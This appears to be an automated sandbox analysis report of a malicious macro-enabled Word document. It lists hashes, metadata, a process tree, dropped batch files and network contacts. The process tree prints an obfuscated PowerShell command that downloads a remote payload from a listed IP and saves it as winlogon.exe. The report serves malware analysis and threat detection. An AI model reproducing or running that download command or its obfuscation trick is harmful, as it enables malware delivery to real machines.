Field | Value |
---|---|
File name | declaration_form (1369).docm |
Full analysis | https://app.any.run/tasks/2a4d679e-36d8-4a14-a841-e8c9345cd76f |
Verdict | Malicious activity |
Analysis date | January 17, 2020, 14:07:58 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/zip |
File info | Zip archive data, at least v2.0 to extract |
MD5 | B381FFC7CFC9AFBDE8A6F833689AEBD4 |
SHA1 | 168558F539494D67271E9138347EA3F3C9A42A14 |
SHA256 | EEC9FB350BB7F542DD8F070CAB6E8688E9D2EFEAC20AF1D87193FF88DFE6894A |
SSDEEP | 1536:piUClVlI4yBU8iWJg7SUv8l/tIZoDeLhw5iROLNTH/JFqylKnai4CvqKde2wNHDs:0JvIlhiuIG/iZoK1wLLNo4wdfwdEBxMY |
Extension | Type |
---|---|
.docx | Word Microsoft Office Open XML Format document (41.2) |
.zip | Open Packaging Conventions container (30.6) |
.ubox | Universe Sandbox simulation (21) |
.zip | ZIP compressed archive (7) |
Field | Value |
---|---|
ZipRequiredVersion | 20 |
ZipBitFlag | - |
ZipCompression | Deflated |
ZipModifyDate | 2020:01:06 17:18:27 |
ZipCRC | 0x1ec99838 |
ZipCompressedSize | 329 |
ZipUncompressedSize | 713 |
ZipFileName | docProps/core.xml |
Field | Value |
---|---|
Creator | Misha |
LastModifiedBy | user |
CreateDate | 2019:11:01 07:42:00Z |
ModifyDate | 2020:01:06 14:08:00Z |
RevisionNumber | 435 |
Application | Microsoft Office Word |
Template | Normal.dotm |
TotalEditTime | 12.7 hours |
Pages | 1 |
Words | - |
Characters | 1 |
DocSecurity | None |
Lines | 1 |
Paragraphs | 1 |
ScaleCrop | No |
HeadingPairs | |
TitlesOfParts | - |
LinksUpToDate | No |
CharactersWithSpaces | 1 |
SharedDoc | No |
HyperlinksChanged | No |
AppVersion | 12 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2300 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\declaration_form (1369).docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
2420 | cmd /c C:\Users\Public\tmp.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3352 | cmd /c mkdir ""C:\Users\Public\tmpdir"" | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1772 | cmd /c C:\Users\Public\tmpdir\tmpd.bat | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2580 | powershell -Command ""(New-Object Net.WebClient).DownloadFile('http://104.168.99.30/rSBv1r', 'C:' + '\' + 'U' + 's' + 'er' + 's\P' + 'ub' + 'lic' + '\tm' + 'pdir\wi' + 'nlo' + 'go' + 'n.ex' + 'e') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA747.tmp.cvr | — | — | — |
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538A3092.jpg | — | — | — |
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZQSHITKYVJUIUFI88UV.temp | — | — | — |
2300 | WINWORD.EXE | C:\Users\Public\tmpdir\tmpd.bat | text | DED44253FED387588D28465E984BF876 | FBDEBA0901D70C7FABAEEBCA1E3AD9D757548E124B31EFF1A1B2731D00757C33 |
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$claration_form (1369).docm | pgc | 4DAD6CA91621D56247DB79B2DB6C2119 | 421924F76485199AC941E784C29A09907B9322ABD66F538C232E13CEBF6E26D4 |
2580 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b4e3.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
2300 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 8B378DCC62035BBABEF8B1C2A131A338 | 7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 |
2300 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | AC3270E9AA8E19E0FA5E342F05065194 | 6B3F14ADB4D566AB92EE2E688918914C5EDEAF298494686BCD22828F7193C89C |
2300 | WINWORD.EXE | C:\Users\Public\tmp.bat | text | 1C1AC5FD1EA331B3C2936416ECE6656E | 1D032C23D105F8D3C4F8FF2744090DC178FE8AB933FD5CBDEF858ADD8F2F2FED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2580 | powershell.exe | GET | 302 | 104.168.99.30:80 | http://104.168.99.30/rSBv1r | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2580 | powershell.exe | 185.61.154.215:443 | analysprinter.online | Namecheap, Inc. | GB | suspicious |
2580 | powershell.exe | 104.168.99.30:80 | — | ColoCrossing | US | unknown |
Domain | IP | Reputation |
---|---|---|
analysprinter.online | | suspicious |